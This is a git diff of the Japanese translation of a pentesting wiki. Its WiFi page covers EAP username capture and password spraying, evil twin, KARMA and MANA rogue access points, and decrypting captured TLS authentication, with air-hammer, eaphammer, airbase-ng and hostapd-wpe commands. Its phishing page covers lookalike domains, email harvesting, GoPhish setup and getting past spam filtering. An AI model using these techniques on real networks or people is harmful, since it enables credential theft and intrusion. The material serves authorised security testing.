+最も安全な認証方法の一つである**PEAP-EAP-TLS**を使用していても、**EAPプロトコルで送信されたユーザー名をキャプチャする**ことが可能です。そのためには、**認証通信をキャプチャ**します(チャンネル内で`airodump-ng`を開始し、同じインターフェースで`wireshark`を使用)し、パケットを`eapol`でフィルタリングします。\ +**"Response, Identity"**パケット内に、クライアントの**ユーザー名**が表示されます。 ![](<../../images/image (850).png>) @@ -380,12 +381,12 @@ pyrit -r psk-01.cap analyze アイデンティティの隠蔽は、EAP-PEAPとEAP-TTLSの両方でサポートされています。WiFiネットワークの文脈では、EAP-Identityリクエストは通常、関連プロセス中にアクセスポイント(AP)によって開始されます。ユーザーの匿名性を保護するために、ユーザーのデバイス上のEAPクライアントからの応答には、初期RADIUSサーバーがリクエストを処理するために必要な基本情報のみが含まれます。この概念は以下のシナリオを通じて示されています: - EAP-Identity = anonymous -- このシナリオでは、すべてのユーザーが擬似的な"anonymous"をユーザー識別子として使用します。初期RADIUSサーバーは、EAP-PEAPまたはEAP-TTLSサーバーとして機能し、PEAPまたはTTLSプロトコルのサーバー側を管理します。内部(保護された)認証方法は、ローカルで処理されるか、リモート(ホーム)RADIUSサーバーに委任されます。 +- このシナリオでは、すべてのユーザーが擬似的な「anonymous」をユーザー識別子として使用します。初期RADIUSサーバーは、EAP-PEAPまたはEAP-TTLSサーバーとして機能し、PEAPまたはTTLSプロトコルのサーバー側を管理します。内部(保護された)認証方法は、ローカルで処理されるか、リモート(ホーム)RADIUSサーバーに委任されます。 - EAP-Identity = anonymous@realm_x - この状況では、異なるレルムのユーザーがそれぞれのレルムを示しながらアイデンティティを隠します。これにより、初期RADIUSサーバーはEAP-PEAPまたはEAP-TTLSリクエストをそれぞれのホームレルムのRADIUSサーバーにプロキシすることができ、これらはPEAPまたはTTLSサーバーとして機能します。初期RADIUSサーバーは、RADIUSリレー ノードとしてのみ機能します。 - あるいは、初期RADIUSサーバーがEAP-PEAPまたはEAP-TTLSサーバーとして機能し、保護された認証方法を処理するか、別のサーバーに転送することもできます。このオプションは、さまざまなレルムに対して異なるポリシーを構成することを容易にします。 -EAP-PEAPでは、PEAPサーバーとPEAPクライアントの間にTLSトンネルが確立されると、PEAPサーバーはEAP-Identityリクエストを開始し、それをTLSトンネルを通じて送信します。クライアントは、この2回目のEAP-Identityリクエストに対して、ユーザーの真のアイデンティティを含むEAP-Identity応答を暗号化されたトンネルを通じて送信します。このアプローチは、802.11トラフィックを傍受している誰にもユーザーの実際のアイデンティティが明らかになるのを効果的に防ぎます。 +EAP-PEAPでは、PEAPサーバーとPEAPクライアントの間にTLSトンネルが確立されると、PEAPサーバーはEAP-Identityリクエストを開始し、それをTLSトンネルを通じて送信します。クライアントは、この2回目のEAP-Identityリクエストに対して、暗号化されたトンネルを通じてユーザーの真のアイデンティティを含むEAP-Identity応答を送信します。このアプローチは、802.11トラフィックを傍受している誰にもユーザーの実際のアイデンティティが明らかになるのを効果的に防ぎます。 EAP-TTLSは、やや異なる手順に従います。EAP-TTLSでは、クライアントは通常、PAPまたはCHAPを使用して認証し、TLSトンネルによって保護されます。この場合、クライアントはトンネル確立後に送信される最初のTLSメッセージにUser-Name属性とPasswordまたはCHAP-Password属性を含めます。 @@ -393,9 +394,9 @@ EAP-TTLSは、やや異なる手順に従います。EAP-TTLSでは、クライ 詳細については[https://www.interlinknetworks.com/app_notes/eap-peap.htm](https://www.interlinknetworks.com/app_notes/eap-peap.htm)を確認してください。 -### EAP-Bruteforce (パスワードスプレー) +### EAP-ブルートフォース(パスワードスプレー) -クライアントが**ユーザー名とパスワード**を使用することが期待される場合(この場合、**EAP-TLSは無効**になります)、**ユーザー名**の**リスト**(次の部分を参照)と**パスワード**を取得し、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**を使用してアクセスを**ブルートフォース**することを試みることができます。 +クライアントが**ユーザー名とパスワード**を使用することが期待される場合(この場合、**EAP-TLSは無効**になります)、**ユーザー名**の**リスト**(次の部分を参照)と**パスワード**を取得し、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**を使用してアクセスを**ブルートフォース**することができます。 ```bash ./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt ``` @@ -417,20 +418,20 @@ EAP-TTLSは、やや異なる手順に従います。EAP-TTLSでは、クライ ### 優先ネットワークリスト(PNL) -- ステーションは、接続するすべてのワイヤレスネットワークのESSIDを優先ネットワークリスト(PNL)に保存し、ネットワーク固有の設定詳細も含まれます。 +- ステーションは、接続するすべてのワイヤレスネットワークのESSIDを優先ネットワークリスト(PNL)に保存し、ネットワーク固有の設定詳細を含めます。 - PNLは、既知のネットワークに自動的に接続するために使用され、接続プロセスを簡素化することでユーザーの体験を向上させます。 ### パッシブスキャン -- APは定期的にビーコーフレームをブロードキャストし、その存在と機能を通知します。これには、ブロードキャストが無効になっていない限り、APのESSIDが含まれます。 +- APは定期的にビーコーフレームをブロードキャストし、その存在と機能を発表します。これには、ブロードキャストが無効になっていない限り、APのESSIDが含まれます。 - パッシブスキャン中、ステーションはビーコーフレームをリスニングします。ビーコンのESSIDがステーションのPNLのエントリと一致する場合、ステーションはそのAPに自動的に接続することがあります。 - デバイスのPNLの知識は、既知のネットワークのESSIDを模倣することで潜在的な悪用を可能にし、デバイスをロゲAPに接続させることができます。 ### アクティブプロービング - アクティブプロービングは、ステーションが近くのAPとその特性を発見するためにプローブリクエストを送信することを含みます。 -- 指定されたプローブリクエストは特定のESSIDをターゲットにし、特定のネットワークが範囲内にあるかどうかを検出するのに役立ちます。隠れたネットワークであってもです。 -- ブロードキャストプローブリクエストはSSIDフィールドが空で、すべての近くのAPに送信され、ステーションはPNLの内容を開示することなく、任意の優先ネットワークをチェックできます。 +- 指定されたプローブリクエストは特定のESSIDをターゲットにし、特定のネットワークが範囲内にあるかどうかを検出するのに役立ちます。たとえそれが隠れたネットワークであってもです。 +- ブロードキャストプローブリクエストは、SSIDフィールドが空であり、すべての近くのAPに送信され、ステーションがPNLの内容を開示することなく、任意の優先ネットワークをチェックできるようにします。 ## インターネットへのリダイレクトを伴うシンプルなAP @@ -500,17 +501,17 @@ echo 1 > /proc/sys/net/ipv4/ip_forward ``` ## Evil Twin -Evil Twin攻撃は、WiFiクライアントがネットワークを認識する方法を悪用し、主にネットワーク名(ESSID)に依存して、ベースステーション(アクセスポイント)がクライアントに対して自認証を行う必要がありません。主なポイントは以下の通りです: +Evil Twin攻撃は、WiFiクライアントがネットワークを認識する方法を利用し、主にネットワーク名(ESSID)に依存して、ベースステーション(アクセスポイント)がクライアントに対して自らを認証する必要がありません。主なポイントは以下の通りです: -- **区別の難しさ**: デバイスは、同じESSIDと暗号化タイプを共有する場合、正当なアクセスポイントと悪意のあるアクセスポイントを区別するのが難しいです。実際のネットワークでは、カバレッジをシームレスに拡張するために、同じESSIDを持つ複数のアクセスポイントを使用することがよくあります。 -- **クライアントのローミングと接続操作**: 802.11プロトコルは、デバイスが同じESS内のアクセスポイント間をローミングすることを可能にします。攻撃者は、デバイスを現在のベースステーションから切断させ、悪意のあるアクセスポイントに接続させることでこれを悪用できます。これは、より強い信号を提供するか、非認証パケットやジャミングなどの方法で正当なアクセスポイントへの接続を妨害することで達成できます。 -- **実行の課題**: 複数の適切に配置されたアクセスポイントがある環境でEvil Twin攻撃を成功させるのは難しい場合があります。単一の正当なアクセスポイントを非認証にすると、攻撃者が近くのすべてのアクセスポイントを非認証にするか、戦略的に悪意のあるアクセスポイントを配置しない限り、デバイスは別の正当なアクセスポイントに接続することがよくあります。 +- **区別の難しさ**: デバイスは、同じESSIDと暗号化タイプを共有する正当なアクセスポイントと悪意のあるアクセスポイントを区別するのに苦労します。実際のネットワークでは、カバレッジをシームレスに拡張するために、同じESSIDを持つ複数のアクセスポイントを使用することがよくあります。 +- **クライアントのローミングと接続操作**: 802.11プロトコルは、デバイスが同じESS内のアクセスポイント間をローミングすることを可能にします。攻撃者は、デバイスを現在のベースステーションから切断させ、悪意のあるアクセスポイントに接続させることでこれを利用できます。これは、より強い信号を提供したり、非認証パケットやジャミングなどの方法で正当なアクセスポイントへの接続を妨害することで達成できます。 +- **実行の課題**: 複数の適切に配置されたアクセスポイントがある環境でEvil Twin攻撃を成功させることは難しい場合があります。単一の正当なアクセスポイントを非認証にすると、攻撃者が近くのすべてのアクセスポイントを非認証にするか、悪意のあるアクセスポイントを戦略的に配置しない限り、デバイスは別の正当なアクセスポイントに接続することがよくあります。 非常に基本的なOpen Evil Twin(インターネットへのトラフィックをルーティングする機能はなし)を作成することができます: ```bash airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon ``` -**eaphammer**を使用してEvil Twinを作成することもできます(注意:eaphammerでEvil Twinを作成するには、インターフェースは**モニター**モードであってはなりません)。 +**eaphammer**を使用してEvil Twinを作成することもできます(注意:eaphammerでEvil Twinを作成するには、インターフェースは**モニタ**モードであってはなりません)。 ```bash ./eaphammer -i wlan0 --essid exampleCorp --captive-portal ``` @@ -555,7 +556,7 @@ hostapd-wpe ./victim/victim.conf -s ``` GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 ``` -これは長い接続時間を避けるためのデフォルトの方法論です。ただし、認証方法を最も弱いものから最も強いものへと指定することもできます: +これは長い接続時間を避けるためのデフォルトの方法論です。ただし、認証方法を最も弱いものから最も強いものまで指定することもできます: ``` --negotiate weakest ``` @@ -576,18 +577,18 @@ Or you could also use: _この方法はPEAP接続でテストされましたが、任意のTLSトンネルを復号化しているため、EAP-TTLSでも機能するはずです。_ -**hostapd-wpe** の **configuration** 内で、_**dh_file**_ を含む行を **コメントアウト**します(`dh_file=/etc/hostapd-wpe/certs/dh` から `#dh_file=/etc/hostapd-wpe/certs/dh` へ)\ -これにより、`hostapd-wpe` は **RSAを使用して鍵を交換**するようになり、**サーバーの秘密鍵を知っていることで**後でトラフィックを**復号化**できるようになります。 +**hostapd-wpe** の **configuration** 内で、_**dh_file**_ を含む行を **コメント** します(`dh_file=/etc/hostapd-wpe/certs/dh` から `#dh_file=/etc/hostapd-wpe/certs/dh` へ)\ +これにより、`hostapd-wpe` は **DHの代わりにRSAを使用して鍵を交換**するようになり、**サーバーの秘密鍵を知っていることで後でトラフィックを復号化**できるようになります。 次に、通常通りその修正された設定で **`hostapd-wpe`** を使用して **Evil Twin** を開始します。また、**Evil Twin攻撃を実行しているインターフェース**で **`wireshark`** を開始します。 -今または後で(認証の試行をいくつかキャプチャした後)、プライベートRSAキーをwiresharkに追加できます:`Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` +今または後で(認証の試行をいくつかキャプチャした後)、`Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` でwiresharkにプライベートRSAキーを追加できます。 新しいエントリを追加し、次の値でフォームを記入します:**IPアドレス = any** -- **ポート = 0** -- **プロトコル = data** -- **キー ファイル**(**キー ファイルを選択**、問題を避けるために**パスワード保護されていないキー ファイルを選択**)。 ![](<../../images/image (687).png>) -新しい **"Decrypted TLS" タブ**を確認してください: +新しい **"Decrypted TLS" タブ** を確認してください: ![](<../../images/image (231).png>) @@ -595,14 +596,14 @@ _この方法はPEAP接続でテストされましたが、任意のTLSトンネ ### ESSID and MAC black/whitelists -異なるタイプのメディアアクセス制御フィルターリスト(MFACL)と、それに対応するモードおよび不正アクセスポイント(AP)の動作への影響: +異なるタイプのメディアアクセス制御フィルタリスト(MFACL)と、それに対応するモードおよび不正アクセスポイント(AP)の動作への影響: 1. **MACベースのホワイトリスト**: - 不正APは、ホワイトリストに指定されたデバイスからのプローブリクエストにのみ応答し、リストにない他のすべてのデバイスには見えなくなります。 2. **MACベースのブラックリスト**: - 不正APは、ブラックリストにあるデバイスからのプローブリクエストを無視し、特定のデバイスに対して不正APを見えなくします。 3. **SSIDベースのホワイトリスト**: -- 不正APは、リストにある特定のESSIDに対してのみプローブリクエストに応答し、Preferred Network Lists(PNL)にそのESSIDが含まれていないデバイスには見えなくなります。 +- 不正APは、リストにある特定のESSIDに対するプローブリクエストにのみ応答し、Preferred Network Lists(PNL)にそのESSIDが含まれていないデバイスには見えなくなります。 4. **SSIDベースのブラックリスト**: - 不正APは、ブラックリストにある特定のESSIDに対するプローブリクエストには応答せず、特定のネットワークを探しているデバイスには見えなくなります。 ```bash @@ -626,25 +627,25 @@ name3 ``` ### KARMA -この方法は、**攻撃者がネットワークに接続しようとするデバイスからのすべてのプローブリクエストに応答する悪意のあるアクセスポイント (AP) を作成することを可能にします**。この技術は、**デバイスが探しているネットワークを模倣することによって、デバイスを攻撃者のAPに接続させる**ものです。デバイスがこの不正なAPに接続リクエストを送信すると、接続が完了し、デバイスは誤って攻撃者のネットワークに接続されます。 +この方法は、**攻撃者がネットワークに接続しようとするデバイスからのすべてのプローブリクエストに応答する悪意のあるアクセスポイント (AP) を作成することを可能にします**。この技術は、**デバイスが探しているネットワークを模倣することによって、デバイスを攻撃者のAPに接続させる**ものです。デバイスがこの不正なAPに接続リクエストを送信すると、接続が完了し、デバイスは誤って攻撃者のネットワークに接続してしまいます。 ### MANA その後、**デバイスは不正なネットワーク応答を無視し始め**、元のkarma攻撃の効果が減少しました。しかし、**MANA攻撃**として知られる新しい方法が、イアン・デ・ヴィリアーズとドミニク・ホワイトによって導入されました。この方法は、不正なAPが**デバイスのブロードキャストプローブリクエストに応答して、デバイスによって以前に確実とされたネットワーク名 (SSID) で応答することによって、デバイスからの優先ネットワークリスト (PNL) をキャプチャする**ことを含みます。この高度な攻撃は、デバイスが既知のネットワークを記憶し、優先順位を付ける方法を利用することで、元のkarma攻撃に対する保護を回避します。 -MANA攻撃は、デバイスからの指向およびブロードキャストプローブリクエストの両方を監視することによって機能します。指向リクエストの場合、デバイスのMACアドレスと要求されたネットワーク名を記録し、この情報をリストに追加します。ブロードキャストリクエストが受信されると、APはデバイスのリスト上のネットワークに一致する情報で応答し、デバイスを不正なAPに接続させるように誘引します。 +MANA攻撃は、デバイスからの指向およびブロードキャストプローブリクエストの両方を監視することによって機能します。指向リクエストの場合、デバイスのMACアドレスと要求されたネットワーク名を記録し、この情報をリストに追加します。ブロードキャストリクエストが受信されると、APはデバイスのリストにあるネットワークに一致する情報で応答し、デバイスを不正なAPに接続させるように誘引します。 ```bash ./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds] ``` ### Loud MANA -**Loud MANA攻撃**は、デバイスが指向プロービングを使用しない場合や、攻撃者にとっての優先ネットワークリスト(PNL)が不明な場合に使用される高度な戦略です。この攻撃は、**同じエリア内のデバイスはPNLにいくつかのネットワーク名を共有する可能性が高い**という原則に基づいています。選択的に応答するのではなく、この攻撃は観測されたすべてのデバイスの結合PNLに見つかったすべてのネットワーク名(ESSID)に対してプローブ応答をブロードキャストします。この広範なアプローチは、デバイスが馴染みのあるネットワークを認識し、悪意のあるアクセスポイント(AP)に接続しようとする可能性を高めます。 +**Loud MANA攻撃**は、デバイスが指向プロービングを使用しない場合や、攻撃者にとってその優先ネットワークリスト(PNL)が不明な場合に使用される高度な戦略です。この攻撃は、**同じエリアにいるデバイスはPNLにいくつかのネットワーク名を共有する可能性が高い**という原則に基づいています。選択的に応答するのではなく、この攻撃は観測されたすべてのデバイスの結合PNLに見つかったすべてのネットワーク名(ESSID)に対してプローブ応答をブロードキャストします。この広範なアプローチは、デバイスが馴染みのあるネットワークを認識し、悪意のあるアクセスポイント(AP)に接続しようとする可能性を高めます。 ```bash ./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds] ``` ### Known Beacon attack -**Loud MANA攻撃**が不十分な場合、**Known Beacon攻撃**は別のアプローチを提供します。この方法は、**単語リストから派生した潜在的なESSIDのリストを循環させながら、任意のネットワーク名に応答するAPをシミュレートすることによって接続プロセスをブルートフォースします**。これは、多数のネットワークの存在をシミュレートし、被害者のPNL内のESSIDと一致することを期待して、作成されたAPへの接続試行を促します。この攻撃は、デバイスを捕らえるためのより攻撃的な試みとして`--loud`オプションと組み合わせることで増幅できます。 +**Loud MANA攻撃**が不十分な場合、**Known Beacon攻撃**は別のアプローチを提供します。この方法は、**単語リストから派生した潜在的なESSIDのリストを循環させながら、任意のネットワーク名に応答するAPをシミュレートすることによって接続プロセスをブルートフォースします**。これにより、多数のネットワークの存在がシミュレートされ、被害者のPNL内のESSIDと一致することを期待し、作成されたAPへの接続試行を促します。この攻撃は、デバイスを捕らえるためのより攻撃的な試みとして`--loud`オプションと組み合わせることで増幅できます。 Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のすべてのESSIDが充電されます(これを`--loud`と組み合わせてLoud MANA + Known beacons攻撃を作成することもできます): ```bash @@ -652,7 +653,7 @@ Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のす ``` **既知のビーコンサージ攻撃** -**既知のビーコンサージ攻撃**は、**ファイルにリストされた各ESSIDのビーコーンフレームを迅速にブロードキャストする**ことを含みます。これにより、偽のネットワークの密集した環境が作成され、特にMANA攻撃と組み合わせることで、デバイスが悪意のあるAPに接続する可能性が大幅に高まります。この技術は、速度とボリュームを利用してデバイスのネットワーク選択メカニズムを圧倒します。 +**既知のビーコンサージ攻撃**は、**ファイルにリストされた各ESSIDのビーコーフレームを迅速にブロードキャストする**ことを含みます。これにより、偽のネットワークの密集した環境が作成され、特にMANA攻撃と組み合わせることで、デバイスが悪意のあるAPに接続する可能性が大幅に高まります。この技術は、速度とボリュームを利用してデバイスのネットワーク選択メカニズムを圧倒します。 ```bash # transmit a burst of 5 forged beacon packets for each entry in list ./forge-beacons -i wlan1 \ @@ -668,14 +669,14 @@ Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のす Wi-Fi Direct接続のセキュリティは、**Wi-Fi Protected Setup (WPS)**を通じて確立されており、セキュアなペアリングのためのいくつかの方法をサポートしています。これには以下が含まれます: - **Push-Button Configuration (PBC)** -- **PIN入力** +- **PINエントリー** - **Near-Field Communication (NFC)** -これらの方法、特にPIN入力は、従来のWi-FiネットワークにおけるWPSと同様の脆弱性にさらされており、同様の攻撃ベクターの標的となります。 +これらの方法、特にPINエントリーは、従来のWi-FiネットワークにおけるWPSと同様の脆弱性にさらされており、同様の攻撃ベクトルの標的となります。 ### EvilDirect Hijacking -**EvilDirect Hijacking**は、Wi-Fi Directに特有の攻撃です。これはEvil Twin攻撃の概念を反映していますが、Wi-Fi Direct接続をターゲットにしています。このシナリオでは、攻撃者が正当なグループオーナーを偽装し、デバイスを悪意のあるエンティティに接続させることを目的としています。この方法は、`airbase-ng`のようなツールを使用して、偽装されたデバイスのチャネル、ESSID、およびMACアドレスを指定することで実行できます。 +**EvilDirect Hijacking**は、Wi-Fi Directに特有の攻撃です。これはEvil Twin攻撃の概念を反映しており、Wi-Fi Direct接続をターゲットにします。このシナリオでは、攻撃者が正当なグループオーナーを偽装し、デバイスを悪意のあるエンティティに接続させることを目的とします。この方法は、`airbase-ng`のようなツールを使用して、偽装されたデバイスのチャネル、ESSID、およびMACアドレスを指定することで実行できます。 ## References @@ -690,6 +691,6 @@ Wi-Fi Direct接続のセキュリティは、**Wi-Fi Protected Setup (WPS)**を - [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)]() - [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/) -TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) +TODO: [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher)を確認してください(Facebookでログインし、キャプティブポータルでWPAを模倣する) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index 0733b77db..bbaa73706 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -5,17 +5,17 @@ ## 手法 1. 被害者の調査 -1. **被害者ドメイン**を選択します。 -2. 被害者が使用している**ログインポータル**を探すために基本的なウェブ列挙を行い、**なりすます**ものを**決定**します。 +1. **被害者のドメイン**を選択します。 +2. 被害者が使用している**ログインポータル**を探すために基本的なウェブ列挙を行い、**なりすます**ポータルを**決定**します。 3. **OSINT**を使用して**メールアドレス**を**見つけます**。 2. 環境の準備 1. フィッシング評価に使用する**ドメインを購入**します。 -2. 関連するメールサービスのレコードを**設定**します(SPF、DMARC、DKIM、rDNS)。 +2. **メールサービス**に関連するレコード(SPF、DMARC、DKIM、rDNS)を**設定**します。 3. **gophish**でVPSを設定します。 3. キャンペーンの準備 1. **メールテンプレート**を準備します。 2. 認証情報を盗むための**ウェブページ**を準備します。 -4. キャンペーンを開始します! +4. キャンペーンを開始! ## 類似のドメイン名を生成するか、信頼できるドメインを購入する @@ -36,7 +36,7 @@ homograph-attacks.md - **置換**: ホモグリフのようですが、あまり目立ちません。ドメイン名の1つの文字を、元の文字の近くにある文字に置き換えます(例: zektser.com)。 - **サブドメイン化**: ドメイン名内に**ドットを挿入します**(例: ze.lster.com)。 - **挿入**: ドメイン名に**文字を挿入します**(例: zerltser.com)。 -- **ドットの欠落**: TLDをドメイン名に追加します(例: zelstercom.com)。 +- **ドットの欠落**: ドメイン名にTLDを追加します(例: zelstercom.com)。 **自動ツール** @@ -51,20 +51,20 @@ homograph-attacks.md ### ビットフリッピング -いくつかのビットが保存されているか通信中に**自動的に反転する可能性があります**。これは、太陽フレア、宇宙線、またはハードウェアエラーなどのさまざまな要因によるものです。 +いくつかのビットが保存または通信中に**自動的に反転する可能性があります**。これは、太陽フレア、宇宙線、またはハードウェアエラーなどのさまざまな要因によるものです。 -この概念が**DNSリクエストに適用されると**、**DNSサーバーによって受信されたドメイン**が最初にリクエストされたドメインと同じでない可能性があります。 +この概念が**DNSリクエストに適用されると**、**DNSサーバーによって受信されたドメイン**が、最初にリクエストされたドメインと同じでない可能性があります。 -例えば、ドメイン「windows.com」の1ビットの変更は「windnws.com」に変わる可能性があります。 +例えば、ドメイン「windows.com」の1ビットの変更により、「windnws.com」に変わることがあります。 -攻撃者は、被害者のドメインに似た複数のビットフリッピングドメインを登録することで**これを利用する可能性があります**。彼らの意図は、正当なユーザーを自分たちのインフラにリダイレクトすることです。 +攻撃者は、被害者のドメインに似た複数のビットフリッピングドメインを**登録することでこれを利用する**かもしれません。彼らの意図は、正当なユーザーを自分たちのインフラにリダイレクトすることです。 -詳細については、[こちらをお読みください](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)。 +詳細については、[https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)をお読みください。 ### 信頼できるドメインを購入する [https://www.expireddomains.net/](https://www.expireddomains.net)で使用できる期限切れのドメインを検索できます。\ -購入する期限切れのドメインが**すでに良好なSEOを持っていることを確認するために**、以下のサイトでそのカテゴリを確認できます: +購入する期限切れのドメインが**すでに良好なSEOを持っていることを確認するために**、以下のサイトでそのカテゴリを検索できます: - [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter) - [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/) @@ -77,8 +77,8 @@ homograph-attacks.md - [https://hunter.io/](https://hunter.io) - [https://anymailfinder.com/](https://anymailfinder.com) -**より多くの**有効なメールアドレスを**発見するか、すでに発見したものを確認するために**、被害者のSMTPサーバーをブルートフォース攻撃できるか確認できます。[メールアドレスの確認/発見方法についてはこちらを学んでください](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration)。\ -さらに、ユーザーが**メールにアクセスするためのウェブポータルを使用している場合**、それが**ユーザーネームのブルートフォース攻撃に対して脆弱であるかどうかを確認し、可能であればその脆弱性を悪用することを忘れないでください**。 +**さらに多くの**有効なメールアドレスを**発見するか、すでに発見したものを**確認するために、被害者のSMTPサーバーをブルートフォース攻撃できるか確認できます。[ここでメールアドレスを確認/発見する方法を学びます](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration)。\ +さらに、ユーザーが**メールにアクセスするためのウェブポータルを使用している場合**、それが**ユーザー名のブルートフォース攻撃に対して脆弱かどうかを確認し、可能であればその脆弱性を悪用することを忘れないでください**。 ## GoPhishの設定 @@ -130,7 +130,7 @@ cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt 次に、**DNS Aレコード** `mail.` をVPSの**IPアドレス**にポイントさせ、**DNS MX**レコードを `mail.` にポイントさせます。 -では、メールを送信するテストを行いましょう: +次に、メールを送信するテストを行いましょう: ```bash apt install mailutils echo "This is the body of the email" | mail -s "This is the subject line" test@email.com @@ -212,7 +212,7 @@ case $1 in start|stop|status) "$1" ;; esac ``` -サービスの設定を完了し、次の操作を行って確認します: +サービスの設定を完了し、次のことを確認します: ```bash mkdir /var/log/gophish chmod +x /etc/init.d/gophish @@ -227,11 +227,11 @@ service gophish stop ### 待機して正当性を保つ -ドメインが古いほど、スパムとして捕まる可能性は低くなります。そのため、フィッシング評価の前にできるだけ長く(少なくとも1週間)待つべきです。さらに、評判の良い分野に関するページを作成すれば、得られる評判はより良くなります。 +ドメインが古いほど、スパムとして検出される可能性は低くなります。そのため、フィッシング評価の前にできるだけ長く(少なくとも1週間)待つべきです。さらに、評判の良い分野に関するページを作成すれば、得られる評判はより良くなります。 1週間待たなければならない場合でも、今すぐにすべての設定を終えることができます。 -### 逆引きDNS(rDNS)レコードの設定 +### リバースDNS(rDNS)レコードの設定 VPSのIPアドレスをドメイン名に解決するrDNS(PTR)レコードを設定します。 @@ -268,14 +268,14 @@ v=DMARC1; p=none > v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB > ``` -### メール設定スコアをテストする +### Test your email configuration score [https://www.mail-tester.com/](https://www.mail-tester.com)を使用してそれを行うことができます。\ ページにアクセスして、彼らが提供するアドレスにメールを送信してください: ```bash echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com ``` -あなたはまた、**メール設定を確認する**ために `check-auth@verifier.port25.com` にメールを送信し、**応答を読む**ことができます(これには、**ポート25を開く**必要があり、メールをrootとして送信した場合はファイル _/var/mail/root_ で応答を確認します)。\ +あなたはまた、**メール設定を確認する**ために `check-auth@verifier.port25.com` にメールを送信し、**レスポンスを読む**ことができます(これには、**ポート25を開く**必要があり、メールをrootとして送信した場合はファイル _/var/mail/root_ でレスポンスを確認します)。\ すべてのテストに合格していることを確認してください: ```bash ========================================================== @@ -287,7 +287,7 @@ DKIM check: pass Sender-ID check: pass SpamAssassin check: ham ``` -あなたはまた、**あなたの管理下にあるGmailにメッセージを送信**し、Gmailの受信トレイで**メールのヘッダー**を確認することができます。`dkim=pass`は`Authentication-Results`ヘッダー欄に存在する必要があります。 +あなたはまた、**あなたの管理下にあるGmailにメッセージを送信し**、Gmailの受信トレイで**メールのヘッダー**を確認することができます。`dkim=pass`は`Authentication-Results`ヘッダー欄に存在する必要があります。 ``` Authentication-Results: mx.google.com; spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com; @@ -295,11 +295,11 @@ dkim=pass header.i=@example.com; ``` ### ​Spamhouseのブラックリストからの削除 -ページ [www.mail-tester.com](https://www.mail-tester.com) は、あなたのドメインがspamhouseによってブロックされているかどうかを示すことができます。あなたのドメイン/IPの削除をリクエストするには: ​[https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/) +ページ [www.mail-tester.com](https://www.mail-tester.com) は、あなたのドメインがspamhouseによってブロックされているかどうかを示すことができます。あなたのドメイン/IPの削除をリクエストすることができます: ​[https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/) ### Microsoftのブラックリストからの削除 -あなたのドメイン/IPの削除をリクエストするには [https://sender.office.com/](https://sender.office.com) にアクセスしてください。 +あなたのドメイン/IPの削除をリクエストすることができます: [https://sender.office.com/](https://sender.office.com). ## GoPhishキャンペーンの作成と開始 @@ -307,13 +307,13 @@ dkim=pass header.i=@example.com; - 送信者プロファイルを識別するための**名前を設定**します - フィッシングメールを送信するアカウントを決定します。提案: _noreply, support, servicedesk, salesforce..._ -- ユーザー名とパスワードは空白のままにできますが、証明書エラーを無視することを確認してください +- ユーザー名とパスワードは空白のままにできますが、「証明書エラーを無視する」にチェックを入れることを確認してください -![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) 